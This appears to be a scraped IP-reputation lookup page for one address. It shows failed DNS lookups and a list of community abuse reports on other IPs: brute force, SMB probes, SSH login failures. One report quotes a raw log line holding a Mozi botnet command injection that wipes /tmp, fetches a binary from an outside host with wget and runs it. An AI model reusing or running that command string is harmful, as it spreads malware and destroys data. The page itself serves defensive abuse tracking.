Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: United States of America (the)

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 16.252.29.212
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 29604
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;16.252.29.212.			IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025022500 1800 900 604800 86400

;; Query time: 16 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Wed Feb 26 00:32:56 CST 2025
;; MSG SIZE  rcvd: 106
Host info
Host 212.29.252.16.in-addr.arpa not found: 2(SERVFAIL)
Nslookup info:
server can't find 16.252.29.212.in-addr.arpa: SERVFAIL
Related IP info:
Related comments:
IP Type Details Datetime
82.207.25.19 attack
Brute forcing email accounts
2020-10-07 07:37:07
200.199.227.195 attack
$f2bV_matches
2020-10-07 12:06:30
120.92.107.97 attackbots
Automatic report - Banned IP Access
2020-10-07 07:51:36
62.210.246.49 attackspambots
Fail2Ban Ban Triggered
2020-10-07 07:49:15
115.59.37.53 attackbots
115.59.37.53 - - [05/Oct/2020:21:40:41 +0100] 80 "GET /shell?cd+/tmp;rm+-rf+*;wget+http://115.59.37.53:39826/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 403 824 "-" "Hello, world"
...
2020-10-07 07:42:17
89.207.91.29 attack
Unauthorized connection attempt from IP address 89.207.91.29 on Port 445(SMB)
2020-10-07 12:03:53
95.219.201.231 attackbotsspam
Icarus honeypot on github
2020-10-07 07:54:05
154.120.230.250 attackbotsspam
Unauthorized connection attempt from IP address 154.120.230.250 on Port 445(SMB)
2020-10-07 12:07:28
45.230.80.13 attackspambots
Autoban   45.230.80.13 AUTH/CONNECT
2020-10-07 12:08:22
213.14.112.92 attackbots
$f2bV_matches
2020-10-07 07:43:34
103.130.108.9 attackspambots
Bruteforce detected by fail2ban
2020-10-07 07:56:39
141.98.9.33 attackspambots
$f2bV_matches
2020-10-07 12:04:44
154.8.144.203 attackspambots
Oct  6 18:39:53 ny01 sshd[30415]: Failed password for root from 154.8.144.203 port 52390 ssh2
Oct  6 18:41:40 ny01 sshd[30628]: Failed password for root from 154.8.144.203 port 47342 ssh2
2020-10-07 07:39:02
98.214.86.3 attackbotsspam
Port scan on 1 port(s): 22
2020-10-07 07:33:11
113.160.196.89 attackbots
20/10/5@16:40:23: FAIL: Alarm-Network address from=113.160.196.89
20/10/5@16:40:23: FAIL: Alarm-Network address from=113.160.196.89
...
2020-10-07 07:49:33

Recently Reported IPs

219.98.123.39 237.162.118.62 3.182.219.51 233.88.61.199
71.201.14.110 220.103.200.175 20.56.212.50 164.16.24.97
56.21.198.20 66.86.159.98 2.254.152.156 63.153.157.161
55.97.1.212 189.19.196.131 54.143.198.53 175.47.23.235
229.156.74.14 51.108.27.209 162.150.220.208 175.185.99.189